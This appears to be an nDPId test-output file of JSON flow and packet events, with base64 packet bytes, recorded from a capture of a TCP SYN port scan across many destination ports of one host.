+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1341,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1341,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1331,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAsbMEAADkGorGsEAAIQA2GNIzSBB\/dUoMYAAAAAGACCAAscAAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1342,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32772,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1342,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1332,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAsfVEAADAGmyGsEAAIQA2GNIzSgATdUoMYAAAAAGACBAC0igAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1343,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1333,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAsMZMAADkG3d+sEAAIQA2GNIzSBDXdUoMYAAAAAGACCAAsWgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1344,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1344,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1334,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAs3h4AADoGMFSsEAAIQA2GNIzSGabdUoMYAAAAAGACDAAS6QAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1345,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060493,"flow_last_seen":1278275060493,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060493,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1345,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1335,"flow_packet_id":1,"flow_last_seen":1278275060493,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060493,"pkt":"ACYLMQczACWzv5HuCABFAAAszXIAADkGQgCsEAAIQA2GNIzS3aHdUoMYAAAAAGACCABS7QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1346,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5961,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1336,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsaFcAACYGuhusEAAIQA2GNIzSF0ndUoMYAAAAAGACDAAVRgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1347,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":58080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1337,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsoCcAACkGf0usEAAIQA2GNIzS4uDdUoMYAAAAAGACCABNrgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1348,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9207,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1348,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1338,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsD\/IAADoG\/oCsEAAIQA2GNIzSI\/fdUoMYAAAAAGACDAAImAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1349,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1349,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1339,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsLzkAADAG6TmsEAAIQA2GNIzSBGbdUoMYAAAAAGACBAAwKQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1350,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1350,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1340,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsdksAADkGmSesEAAIQA2GNIzSS1PdUoMYAAAAAGACCADlOwAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1351,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":513,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1351,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1341,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsyvwAADAGTXasEAAIQA2GNIzSAgHdUoMYAAAAAGACBAAyjgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1352,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1352,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1342,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs0McAACsGTKusEAAIQA2GNIzSAtLdUoMYAAAAAGACEAAlvQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1353,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49153,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1353,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1343,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsyTwAADQGSzasEAAIQA2GNIzSwAHdUoMYAAAAAGACBAB0jQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1354,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1354,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1344,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs928AADQGHQOsEAAIQA2GNIzSH0HdUoMYAAAAAGACBAAVTgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1355,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3370,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1355,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1345,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsvbAAAC0GXcKsEAAIQA2GNIzSDSrdUoMYAAAAAGACCAAjZQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1356,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1356,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1346,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs2wcAADYGN2usEAAIQA2GNIzSEJLdUoMYAAAAAGACDAAb\/QAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1357,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1357,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1347,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs2yMAADIGO0+sEAAIQA2GNIzSF3ndUoMYAAAAAGACDAAVFgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1358,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1358,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1348,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsbeEAADIGqJGsEAAIQA2GNIzSDx3dUoMYAAAAAGACDAAdcgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1359,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1359,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1349,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs6ogAACUGOOqsEAAIQA2GNIzSBC3dUoMYAAAAAGACCAAsYgAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1360,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060496,"flow_last_seen":1278275060496,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060496,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1360,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1350,"flow_packet_id":1,"flow_last_seen":1278275060496,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060496,"pkt":"ACYLMQczACWzv5HuCABFAAAsm4gAADYGduqsEAAIQA2GNIzSPvHdUoMYAAAAAGACDADtnQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1361,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1361,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1351,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsX1oAACYGwxisEAAIQA2GNIzTI4\/dU4MZAAAAAGACDAAI\/QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1362,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1362,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1352,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsZuAAAC0GtJKsEAAIQA2GNIzTFxbdU4MZAAAAAGACCAAZdgAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1363,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":691,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1363,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1353,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsoCQAACcGgU6sEAAIQA2GNIzTArPdU4MZAAAAAGACEAAl2QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1364,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1364,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1354,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsZsIAACkGuLCsEAAIQA2GNIzTBqTdU4MZAAAAAGACCAAp6AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1365,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 